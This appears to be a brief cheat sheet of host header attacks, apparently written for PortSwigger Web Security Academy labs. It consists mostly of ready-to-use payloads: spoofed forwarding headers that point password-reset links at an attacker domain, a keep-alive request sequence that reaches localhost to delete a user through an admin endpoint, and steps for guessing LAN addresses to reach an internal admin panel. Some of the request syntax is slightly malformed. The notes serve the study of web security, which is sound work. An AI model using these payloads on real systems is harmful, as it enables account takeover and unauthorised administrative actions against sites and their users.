Host Headers

Spoof of ip address when reset password:

#use one of this
X-Forwarded-Host: EXPLOIT.net
X-Host: EXPLOIT.net
X-Forwarded-Server: EXPLOIT.net

Sending grouped request in sequence using single connection and setting the connection header to keep-alive, bypass host header validation and enable SSRF exploit of local server.

GET / HTTP/1.1
Host: TARGET.net
Cookie: session=ValueOfSessionCookie
Content-Length: 48
Content-Type: text/plain;charset=UTF-8
Connection: keep-alive


POST /admin/delete HTTP/1.1
Host: localhost
Cookie: _lab=YOUR-LAB-COOKIE; session=YOUR-SESSION-COOKIE
Content-Type: x-www-form-urlencoded
Content-Length: 53

csrf=TheCSRFTokenValue&username=carlos

Try to get to the admin page through localhost or lan ip. Collaborator request will confirm that it is possible to access out of band resource

#Full path in request
GET / or https://YOUR-LAB-ID.web-security-academy.net/
Host: BURP-COLLABORATOR-SUBDOMAIN or 192.168.0.$$

#than try to guess ip from intruder and run admin to get csrf and then do action
GET /admin
Host: 192.168.0.17

GET /admin/delete?csrf=jslsjf?username=carlos
Host: 192.168.0.17

Last updated